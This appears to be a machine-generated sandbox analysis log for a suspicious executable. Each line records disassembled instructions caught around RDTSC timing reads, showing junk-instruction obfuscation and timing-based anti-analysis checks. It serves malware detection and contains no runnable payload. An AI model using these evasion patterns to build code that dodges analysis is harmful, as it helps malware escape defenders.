Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11956E3 second address: 11956E8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1195804 second address: 119580C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 119580C second address: 1195814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1195814 second address: 119581A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 119581A second address: 119581F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 119581F second address: 1195835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5D68C8C001h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1195835 second address: 1195853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F5D692C6EF2h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1195853 second address: 1195857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1195857 second address: 119585B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 119B474 second address: 119B47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 119B47A second address: 119B48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F5D692C6EE6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 119B48B second address: 119B491 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1167239 second address: 116725C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5D692C6EF9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11A2102 second address: 11A2123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D68C8C007h 0x00000009 jc 00007F5D68C8BFF6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11A2123 second address: 11A2144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11A22B5 second address: 11A22B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11A22B9 second address: 11A22BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11A22BF second address: 11A22C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11A22C5 second address: 11A22CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11A2A8C second address: 11A2A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11A2A91 second address: 11A2A9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11A333D second address: 11A3341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A3493 second address: 11A3499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A37D0 second address: 11A37D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A37D5 second address: 11A37DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5D692C6EE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A3B17 second address: 11A3B21 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5D68C8BFFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A4046 second address: 11A404A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A40FA second address: 11A411D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D68C8C008h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A411D second address: 11A4121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A4121 second address: 11A412F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F5D68C8BFF6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A44CB second address: 11A44D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A461F second address: 11A462D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A4C64 second address: 11A4C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F5D692C6EF9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A565B second address: 11A5660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A659F second address: 11A6619 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F5D692C6EE8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add edi, 5EBF4176h 0x00000029 xor esi, dword ptr [ebp+122D2CE6h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F5D692C6EE8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b mov si, 4B00h 0x0000004f push 00000000h 0x00000051 sub dword ptr [ebp+122D3A57h], eax 0x00000057 mov edi, dword ptr [ebp+122D2D2Eh] 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 js 00007F5D692C6EE6h 0x00000067 jc 00007F5D692C6EE6h 0x0000006d popad 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A6F66 second address: 11A6F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A6F6C second address: 11A6F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A9D0B second address: 11A9D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AD4E8 second address: 11AD4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AF600 second address: 11AF606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AF606 second address: 11AF65D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor edi, 14059895h 0x0000000f push 00000000h 0x00000011 xor edi, 6FEF6B76h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F5D692C6EE8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 add edi, dword ptr [ebp+122D2185h] 0x00000039 sbb di, 8538h 0x0000003e push eax 0x0000003f pushad 0x00000040 push ecx 0x00000041 jmp 00007F5D692C6EEAh 0x00000046 pop ecx 0x00000047 push edi 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A8F56 second address: 11A8F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B05F9 second address: 11B05FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B05FD second address: 11B0656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F5D68C8BFFAh 0x0000000e mov di, EE27h 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 jmp 00007F5D68C8BFFFh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F5D68C8BFF8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 mov ebx, 01CE7400h 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e push ecx 0x0000003f jnl 00007F5D68C8BFF6h 0x00000045 pop ecx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B0656 second address: 11B065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B065C second address: 11B0660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B24F6 second address: 11B251A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F5D692C6EEFh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D692C6EECh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B251A second address: 11B253C instructions: 0x00000000 rdtsc 0x00000002 je 00007F5D68C8BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov edi, eax 0x0000000e push 00000000h 0x00000010 mov ebx, 1F4A9CB9h 0x00000015 mov edi, eax 0x00000017 push 00000000h 0x00000019 mov bx, di 0x0000001c push eax 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AE593 second address: 11AE597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B0796 second address: 11B079C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B1700 second address: 11B1733 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jo 00007F5D692C6EECh 0x00000011 jns 00007F5D692C6EE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F5D692C6EE6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B079C second address: 11B07A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B1733 second address: 11B17CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5D692C6EE8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D33A4h], ebx 0x00000028 mov edi, eax 0x0000002a push dword ptr fs:[00000000h] 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F5D692C6EE8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b push ecx 0x0000004c add ebx, dword ptr [ebp+122D2286h] 0x00000052 pop edi 0x00000053 add edi, 6C6A63EAh 0x00000059 mov dword ptr fs:[00000000h], esp 0x00000060 jmp 00007F5D692C6EF3h 0x00000065 mov eax, dword ptr [ebp+122D00C5h] 0x0000006b or edi, 5194547Ch 0x00000071 push FFFFFFFFh 0x00000073 or edi, 462CDCC7h 0x00000079 push eax 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e popad 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B2784 second address: 11B2789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AE6C2 second address: 11AE6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D692C6EEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B4513 second address: 11B4517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B17CC second address: 11B17DA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AE6D4 second address: 11AE6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B0892 second address: 11B0896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B4517 second address: 11B4532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C003h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B17DA second address: 11B17DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B0896 second address: 11B089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B6BB0 second address: 11B6C43 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007F5D692C6EE6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F5D692C6EE8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 pushad 0x00000033 sub dword ptr [ebp+122D3373h], edx 0x00000039 popad 0x0000003a push 00000000h 0x0000003c mov ebx, 336A36BCh 0x00000041 push 00000000h 0x00000043 add di, FC2Ah 0x00000048 call 00007F5D692C6EF6h 0x0000004d jmp 00007F5D692C6EF8h 0x00000052 pop ebx 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F5D692C6EF2h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11BE24C second address: 11BE2E3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D68C8BFFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F5D68C8BFF8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1DEFh], ebx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F5D68C8BFF8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 call 00007F5D68C8C005h 0x0000004c mov edi, 2656864Eh 0x00000051 pop ebx 0x00000052 push 00000000h 0x00000054 mov bl, ch 0x00000056 xchg eax, esi 0x00000057 push edx 0x00000058 jne 00007F5D68C8BFF8h 0x0000005e pop edx 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F5D68C8BFFCh 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11B7D0B second address: 11B7D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, 00C1ED62h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 xor edi, 0C4B9E18h 0x0000001b mov ebx, dword ptr [ebp+122D1E1Fh] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F5D692C6EE8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000017h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+122D2B16h] 0x00000048 mov eax, dword ptr [ebp+122D12D5h] 0x0000004e mov bx, 1EC1h 0x00000052 push FFFFFFFFh 0x00000054 mov ebx, dword ptr [ebp+122D2B5Ah] 0x0000005a nop 0x0000005b push edx 0x0000005c pushad 0x0000005d push ecx 0x0000005e pop ecx 0x0000005f jmp 00007F5D692C6EF4h 0x00000064 popad 0x00000065 pop edx 0x00000066 push eax 0x00000067 push eax 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11BE2E3 second address: 11BE2E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C9C83 second address: 11C9C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5D692C6EF1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C9C9E second address: 11C9CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C9CA3 second address: 11C9CB3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F5D692C6EE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C9CB3 second address: 11C9CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C952C second address: 11C9537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C9537 second address: 11C9540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11C97D4 second address: 11C97FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F5D692C6EE6h 0x00000009 jmp 00007F5D692C6EF5h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5D692C6EEAh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDEF3 second address: 11CDF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F5D68C8BFF6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF00 second address: 11CDF1C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5D692C6EEDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF1C second address: 11CDF21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF21 second address: 11CDF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F5D692C6EE6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF37 second address: 11CDF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF3B second address: 11CDF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
